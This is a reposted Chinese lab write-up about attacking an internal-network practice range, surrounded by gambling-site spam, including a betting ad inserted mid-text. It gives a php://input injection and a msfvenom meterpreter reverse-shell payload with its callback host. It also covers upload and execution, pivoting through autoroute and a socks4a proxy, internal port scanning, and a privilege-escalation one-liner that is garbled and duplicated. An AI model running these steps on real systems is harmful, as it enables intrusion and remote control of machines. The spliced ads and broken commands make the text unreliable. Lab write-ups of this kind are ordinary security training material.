欢迎访问www.allbetgaming.com!

首页科技正文

电银付官网(dianyinzhifu.com):记一次糟心的内网靶场实战

admin2020-11-30137

一开始的时刻对整个内网的拓扑结构还不熟,以是做的时刻有许多方式都没有想到去用,人人多多指教。

一、环境准备

用网线毗邻交换机

设置Winodwss攻击机IP为172.16.6.203

攻击机Kali IP为172.16.6.202

主机IP为172.16.6.201

网关为172.16.6.1

子网掩码255.255.255.0

目的IP 172.16.6.10

二、渗透详细流程总览拓扑图

一开始以为192.168.6.200,一台通俗的双网卡主机,没有发现是防火墙,以是10.1.1.0网段的主机拓扑不够清晰,厥后先生讲了才知道,防火墙做了端口映射。E主机的445端口映射到防火墙445端口,F主机的3389端口映射到防火墙的3389端口。

电银付官网(dianyinzhifu.com):记一次糟心的内网靶场实战 第1张

攻击目的172.16.6.101、菜刀毗邻

接见主页。发现伪协议注入点。

http://172.16.6.10/index.php?page=php://input

使用菜刀毗邻,菜刀版本需2020年的版本。

2、天生并上传木马且回连meterpreter

查看phpinfo目的主机为Linux系统的主机。

Msf天生木马msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147 LPORT=2337 -f elf -a x86 —platform linux -o /home/hula.elf

并use exploit/multi/handle模块监听木马回连情形。

将木马通过菜刀上传木马,赋予运行权限,然后执行。

发现回连到meterpreter。

3、内网信息网络(同时添加路由并确立socks署理)

ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10。

自动添加路由run post/multi/manage/autoroute。

,

皇冠注册

www.huangguan.us是一个提供皇冠代理APP下载、皇冠会员APP下载、皇冠体育最新登录线路、新2皇冠网址的的体育平台。新皇冠体育官网是多年来值得广大客户信赖的平台,我们期待您的到来!

,

添加路由与署理:

use auxiliary/server/socks4a

show options

set srvhost 172.16.6.147

set srvport 1080

使用portscan模块举行端口扫描

search portscan

set rhosts 192.168.6.0/24。

ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10

给msf添加192.168.6.10段的路由,run autoroute -s 192.168.6.0/24

添加署理:

use auxiliary/server/socks4a

show options

srvhost设为本机

srvport默认1080

可以看到扫描出15、16、17、200四台主机,端口开放情形为

192.168.6.15 21/22

192.168.6.16 22/80/3306/8080

192.168.6.17 22/80/3306

192.168.6.200 80/135/445/3389

4、实验本机提权

用一句话提权

printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever exploit.conf” staprun -u whatever> exploit.conf; MODPROBE_OPTIONS=”-C

转载声明:本站发布文章及版权归原作者所有,转载本站文章请注明文章来源!

本文链接:https://www.guangxianchuangan.com/post/1313.html

网友评论

最新评论